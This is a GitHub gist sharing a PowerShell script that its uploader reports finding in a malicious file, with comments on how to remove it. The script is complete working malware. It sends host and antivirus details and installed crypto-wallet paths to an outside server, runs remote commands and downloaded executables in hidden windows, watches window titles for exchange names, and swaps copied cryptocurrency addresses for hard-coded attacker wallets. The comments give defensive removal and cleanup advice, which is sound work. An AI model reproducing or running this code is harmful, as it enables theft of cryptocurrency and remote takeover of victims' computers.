Skip to content

Instantly share code, notes, and snippets.

@infernoboy

infernoboy/danger.ps1

Created April 8, 2022 23:39
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save infernoboy/cf114fda56ff3706478e0d1e6a1a1b27 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save infernoboy/cf114fda56ff3706478e0d1e6a1a1b27 to your computer and use it in GitHub Desktop.
Download ZIP
This script was found in a malicious file not being detected by any AV as reported by virustotal
Raw
danger.ps1
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
function WMI([string] $class, [string] $value) {
$val = $null;
$results = (Get-WmiObject -Class $class) ;
foreach ($item in $results) {
$val = $item[$value];
break;
}
if ($val -eq $null) {
$val = [Guid]::NewGuid().ToString();
}
return $val;
}
function Get-HWID() {
return (WMI 'win32_logicaldisk' "VolumeSerialNumber")
}
function ik9hXhN11R() {
return (WMI 'Win32_OperatingSystem' "Caption")
}
function P9TEtu77LCNtD() {
return (WMI 'Win32_Processor' "AddressWidth")
}
function av_enabled([uint32]$state) {
[byte[]] $bytes = [System.BitConverter]::GetBytes($state);
if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
return "Enabled";
}
elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
return "Disabled";
}
return "Unknown";
}
function TmBvivf3Wwj8U7NzZh() {
$avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
$avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
$avf = New-Object Collections.Generic.List[string];
foreach ($av in $avs) {
$enabled = (av_enabled $av.productState);
$avf.Add($av.displayName + " [$enabled]")
}
return [string]::Join(", ", $avf.ToArray())
}
function vxUABGtfQ7B7([string]$str) {
if ($str.Length -eq 0) {
return "";
}
$str = $str.Replace("/", "");
return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}
$_HWID_ = Get-HWID;
function getUserAgent {
return "$($__Version__)_$($_HWID_)\" + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + '\' + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + '\' + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + '\' + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + '\' + (FindPaths) + '\'
}
function oUjmVhxHJ4Qhrw($data, $notify) {
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
}
$cli = New-Object System.Net.WebClient;
$useragent = getUserAgent;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
if ($notify) {
$cli.Headers['X-notify'] = $notify
}
$Response = $cli.UploadString($EndPointURL, $data);
$worker = $cli.ResponseHeaders["worker"];
if ($worker -eq "0") {
$WorkerEn.Reset() | Out-Null;
}
else {
$WorkerEn.Set() | Out-Null;
}
return $Response.ToString()
}
function DownloadFile([string]$URL, [string]$Filename) {
[string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
}
else {
$cli = New-Object System.Net.WebClient;
$cli.Headers['User-Agent'] = $UserAgent;
$cli.DownloadFile($URL, $Filename);
}
}
function yQM1ybBDSjEP($url, $path, $wait) {
DownloadFile $url $path
}
function Gn4bSDMHKIxEE8UP7wZJ($quit) {
Remove-Item -Path $svauXHdYmXwV1whE;
if ($quit) {
exit(0);
}
}
function main {
$ZFKUuv2t12Af = "|V|";
$AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + '\';
$svauXHdYmXwV1whE = $scriptItem.FullName;
$aWOPoMdm8aLL89 = $scriptItem.Name;
$EwcQB8qBuCScs = "powershell.exe";
while ($true) {
try {
[string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;
[string[]] $sep = $ZFKUuv2t12Af;
$Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
$ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
$JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
if ($ivI0sA6txn5XPifq -eq "Cmd") {
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG)
}
if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
$path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
$cmd = $Fd1Jal88zKyxij[3] + $path;
yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
Start-Sleep 1
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd)
}
if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
Gn4bSDMHKIxEE8UP7wZJ $true
}
}
catch {}
try {
FindWindow
}
catch
{}
Start-Sleep 1
}
}
$pathdata =
@'
[
{
"root": "%appdata%",
"targets": [
{
"name": "Exodus-A",
"path": "Exodus"
},
{
"name": "Atomic-A",
"path": "Atomic Wallet"
},
{
"name": "Electrum-A",
"path": "Electrum"
},
{
"name": "Ledger-A",
"path": "Ledger Live"
},
{
"name": "Jaxx-A",
"path": "Jaxx Liberty"
},
{
"name": "com.liberty.jaxx-A",
"path": "com.liberty.jaxx"
},
{
"name": "Guarda-A",
"path": "Guarda"
},
{
"name": "Armory-A",
"path": "Armory"
},
{
"name": "DELTA-A",
"path": "DELTA"
},
{
"name": "TREZOR-A",
"path": "TREZOR Bridge"
},
{
"name": "Bitcoin-A",
"path": "Bitcoin"
},
{
"name": "binance-A",
"path": "binance"
}
]
},
{
"root": "%localappdata%",
"targets": [
{
"name": "Blockstream-A",
"path": "Blockstream Green"
},
{
"name": "Coinomi-A",
"path": "Coinomi"
},
{
"name": "Exodus-A",
"path": "exodus"
},
{
"name": "Docker-A",
"path": "Docker"
}
]
},
{
"root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-C",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-C",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-C",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-C",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-C",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-C",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
},
{
"root": "%ProgramFiles(x86)%",
"targets": [
{
"name": "Electrum-A",
"path": "Electrum"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
}
]
},
{
"root": "%localappdata%\\Programs",
"targets": [
{
"name": "atomic-A",
"path": "atomic"
},
{
"name": "TrezorSuite-A",
"path": "Trezor Suite"
}
]
},
{
"root": "%ProgramFiles%",
"targets": [
{
"name": "Binance-A",
"path": "Binance"
},
{
"name": "BitcoinCore-A",
"path": "Bitcoin"
},
{
"name": "LedgerLive-A",
"path": "Ledger Live"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
},
{
"name": "Coinomi-E",
"path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-B",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-B",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-B",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-B",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-B",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
}
]
'@;
function FindPaths {
$a = ConvertFrom-Json $pathdata
$results = New-Object Collections.Generic.List[string];
try {
$ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
Foreach ($i in $ba) {
if ($i.Name -match "ebextension@metamask.io.xpi") {
try {
[string] $ss = "metamask-F"
$results.Add($ss)
}
catch {
Write-Host "error"
}
}
}
}
catch {}
foreach ($entry in $a) {
$rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
foreach ($target in $entry.targets) {
if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
$results.Add($target.name)
}
}
}
$ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
return $ret;
}
function FindWindow {
$keywords = @('binance', 'coinbase', 'blockchain', 'voyager', 'blockfi', 'coindesk', 'etoro', 'kucoin', 'citi', 'paxful', 'paypal', 'huobi', 'poloniex', 'bittrex', 'kraken', 'bitfinex', 'bitstamp')
$windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)
foreach ($wndobj in $windows) {
[string]$wnd = $wndobj.MainWindowTitle;
foreach ($keyword in $keywords) {
if ($wnd.ToLower().Contains($keyword.ToLower())) {
try {
$contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ', '');
$logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ', '');
if ( $contentfile -eq $keyword.ToLower().replace(' ', '') ) {
$gtr = "";
}
else {
$datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ', '');
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
log_event 'newnewapp' ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
}
}
catch {
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
}
}
}
}
}
$job1 = Start-Job -ArgumentList $EndPointURL, (getUserAgent), $WorkerEnHandle -ScriptBlock {
param (
[string]
$EndPointURL,
[string]
$UserAgent,
[string]
$WorkerEnHandle
)
[System.Threading.EventWaitHandle]$WorkerEn = $null;
if ([System.Threading.EventWaitHandle]::TryOpenExisting($WorkerEnHandle, [ref]$WorkerEn) -eq $false) {
$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset);
}
[System.Environment]::CurrentDirectory = $PWD.Path;
#Add-Type -TypeDefinition ([System.IO.File]::ReadAllText('User32.cs'))
$Framework_Arch = '';
if([System.IntPtr]::Size -eq 8)
{
$Framework_Arch = '64';
}
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.dll";
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.InteropServices.dll";
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class User32
{
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern ushort RegisterClassEx(ref WNDCLASSEX lpwcx);
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr CreateWindowEx(UInt32 dwExStyle, IntPtr lpClassName, string lpWindowName, UInt32 dwStyle,
Int32 x, Int32 y, Int32 nWidth, Int32 nHeight, IntPtr hWndParent, IntPtr hMenu, IntPtr hInstance, IntPtr lpParam);
[DllImport("user32.dll")]
public static extern int GetMessage(out MSG lpMsg, IntPtr hWnd, uint wMsgFilterMin, uint wMsgFilterMax);
[DllImport("user32.dll")]
public static extern bool TranslateMessage([In] ref MSG lpMsg);
[DllImport("user32.dll")]
public static extern IntPtr DispatchMessage([In] ref MSG lpmsg);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool AddClipboardFormatListener(IntPtr hwnd);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool RemoveClipboardFormatListener(IntPtr hwnd);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WNDCLASSEX
{
[MarshalAs(UnmanagedType.U4)]
public int cbSize;
[MarshalAs(UnmanagedType.U4)]
public int style;
public WNDPROC lpfnWndProc; // not WndProc
public int cbClsExtra;
public int cbWndExtra;
public IntPtr hInstance;
public IntPtr hIcon;
public IntPtr hCursor;
public IntPtr hbrBackground;
public string lpszMenuName;
public string lpszClassName;
public IntPtr hIconSm;
//Use this function to make a new one with cbSize already filled in.
//For example:
//var WndClss = WNDCLASSEX.Build()
public static WNDCLASSEX Build()
{
var nw = new WNDCLASSEX();
nw.cbSize = Marshal.SizeOf(typeof(WNDCLASSEX));
return nw;
}
}
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr DefWindowProcW(IntPtr hWnd, UInt32 msg, UIntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool OpenClipboard(IntPtr hWndNewOwner);
[DllImport("user32.dll")]
public static extern IntPtr GetClipboardData(uint uFormat);
[DllImport("user32.dll")]
public static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);
[DllImport("user32.dll")]
public static extern bool EmptyClipboard();
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalLock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern bool GlobalUnlock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalFree(IntPtr hMem);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool CloseClipboard();
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate IntPtr WNDPROC(IntPtr hWnd, uint msg, UIntPtr wParam, IntPtr lParam);
[StructLayout(LayoutKind.Sequential)]
public struct POINT
{
public int X;
public int Y;
}
[StructLayout(LayoutKind.Sequential)]
public struct MSG
{
public IntPtr hwnd;
public uint message;
public UIntPtr wParam;
public IntPtr lParam;
public uint time;
public POINT pt;
public uint lPrivate;
}
}
"@
$address_book = ConvertFrom-Json @"
[
{
"a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
"r": "^bc1[a-z0-9]{39,59}$",
"c": "BTC"
},
{
"a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
"r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
"r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
"r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
"c": "BCH"
},
{
"a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
"r": "^(bnb)([a-z0-9]{39})$",
"c": "BNB"
},
{
"a": "0x884467182849bA788ba89300e176ebe11624C882",
"r": "^0x[a-fA-F0-9]{40}$",
"c": "ETH"
},
{
"a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
"r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
"c": "XMR"
},
{
"a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
"r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
"c": "XRP"
},
{
"a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
"r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
"c": "DOGE"
},
{
"a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
"r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
"c": "DASH"
}
]
"@;
function Set-Clip {
param (
[string]
$text
)
if ($text -eq $null) {
$text = "";
}
$text += [char]0;
[byte[]]$textb = [System.Text.Encoding]::Unicode.GetBytes($text);
$hMem = [User32]::GlobalAlloc(0x0002, [UIntPtr]::new($textb.Length));
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
[System.Runtime.InteropServices.Marshal]::Copy($textb, 0, $tmp, $textb.Length) | Out-Null;
[User32]::GlobalUnlock($hMem) | Out-Null;
[User32]::OpenClipboard([System.IntPtr]::Zero) | Out-Null;
[User32]::EmptyClipboard() | Out-Null; ;
[User32]::SetClipboardData(13, $hMem) | Out-Null;
[User32]::CloseClipboard() | Out-Null;
return;
}
[User32]::GlobalFree($hMem) | Out-Null;
}
}
function Get-Clip {
[string]$text = $null;
if ([User32]::OpenClipboard([System.IntPtr]::Zero) -ne 0) {
$hMem = [User32]::GetClipboardData(13);
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
$text = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($hMem);
[User32]::GlobalUnlock($hMem) | Out-Null;
}
}
[User32]::CloseClipboard() | Out-Null;
}
return $text;
}
function Set-Log([string]$log) {
$cli = New-Object System.Net.WebClient;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($UserAgent));
$cli.Headers['X-notify'] = $log;
$cli.UploadString($EndPointURL, '') | Out-Null;
}
function Handle_WM_CLIPBOARDUPDATE {
try {
if ($WorkerEn.WaitOne(0) -eq $false) {
return;
}
}
catch {
}
try {
[string]$text = Get-Clip;
if ([string]::IsNullOrEmpty($text)) {
return;
}
$text = $text.Trim();
foreach ($entry in $address_book) {
if (($text -ne $entry.a) -and ($text -match $entry.r)) {
Set-Clip $entry.a
Set-Log ($entry.c + " - " + $text + " - " + $entry.a)
}
}
}
catch {
}
}
$wndProc = [User32+WndProc] {
param (
[IntPtr]
$hwnd,
[uint32]
$msg,
[System.UIntPtr]
$wParam,
[IntPtr]
$lParam
)
return [User32]::DefWindowProcW($hwnd, $msg, $wParam, $lParam);
}
$wx = [User32+WNDCLASSEX]::Build();
$wx.lpfnWndProc = $wndProc;
$wx.hInstance = [IntPtr]::Zero;
$wx.lpszClassName = [Guid]::NewGuid().ToString();
[uint16]$atom = [User32]::RegisterClassEx([ref]$wx);
[IntPtr]$hwnd = [User32]::CreateWindowEx(0, [IntPtr]::new($atom), [Guid]::NewGuid().ToString(), 0, 0, 0, 0, 0, [IntPtr]::new(-3), [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);
[User32]::AddClipboardFormatListener($hwnd) | Out-Null;
$msg = [User32+MSG]::new()
while ([User32]::GetMessage([ref]$msg, 0, 0, 0) -gt 0) {
if ($msg.message -eq 0x031D) {
Handle_WM_CLIPBOARDUPDATE;
}
[User32]::TranslateMessage([ref]$msg) | Out-Null;
[User32]::DispatchMessage([ref]$msg) | Out-Null;
}
[User32]::RemoveClipboardFormatListener($hwnd) | Out-Null;
}
while ($true) {
try {
main
}
catch {
}
}
@p4cm4n97
Copy link

p4cm4n97 commented Mar 9, 2026

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

Please I have a similar problem after trying to install a cracked app, bitdefender is giving two warnings "PowerShell tried to load a malicious resource detected as CMD:Heur.BZC.ZFV.Nioc.1.6C085513 and was blocked. Your device is safe." under antivirus and "We blocked this dangerous page for your protection:
http://45.156.87.17/task
Accessed by: powershell.exe
Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent." under infected web resource detected, please I need help.

@Officialkarz
Copy link

Officialkarz commented Mar 9, 2026

Security alerts like this feel stressful. The alert shows Bitdefender worked as expected and blocked a harmful connection.
When software from cracked or untrusted sites runs PowerShell commands and reaches unknown IP addresses, risk rises. Many malware samples act this way. They try to download more code or open a remote channel.
Why the alert appeared
The alert CMD:Heur.BZC comes from Bitdefender Advanced Threat Defense.
This system studies behavior. It does not rely only on known virus signatures.
The engine saw actions linked with malware. Example actions include:
• Hidden PowerShell execution
• Contact with unknown external IP
• Attempted script download or execution
Bitdefender blocked the connection. The program which triggered the action likely still exists on the system.
Steps to take now
Disconnect the computer
Turn off WiFi or unplug Ethernet.
This blocks communication with the attacker server and blocks additional downloads.
Find what triggers the PowerShell command
Malware often installs persistence. It runs again after restart.
Check Task Scheduler
• Press Win + R
• Type taskschd.msc
• Open Task Scheduler Library
• Look for unusual task names
• Check tasks launching powershell.exe with long arguments or encoded commands
If a suspicious task appears:
• Right click
• Disable it first
• Do not delete yet
Use Autoruns from Microsoft Sysinternals
Autoruns lists every startup item. Malware often hides in startup entries.
Steps:
• Download Autoruns
• Run as Administrator
• Check tabs such as Logon, Scheduled Tasks, Services, and WMI
• Look for unknown entries pointing to temp folders, AppData, or random file names
Disable suspicious entries.
Run deeper scans
Use more than one scanner.
Run Microsoft Defender Offline Scan
Steps:
• Open Windows Security
• Virus and Threat Protection
• Scan Options
• Select Microsoft Defender Offline Scan
The system restarts and scans before Windows loads. This catches stubborn malware.
Run Malwarebytes full scan
The free version works well for cleaning leftovers from cracked software infections.
Important warning about cracked software
Cracked installers often hide malware. Many contain droppers or backdoors.
Common risks include:
• credential theft
• remote system control
• crypto wallet theft
• keylogging
If cracked software ran on the system, assume account exposure.
Actions to take after cleaning:
• change passwords from a clean device
• enable two factor authentication on email, exchanges, and wallets
• review login history on major accounts
Next step
If Bitdefender alerts continue every few minutes, persistence still exists. Something keeps launching the PowerShell command.
Guidance through Autoruns helps identify the exact file responsible.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment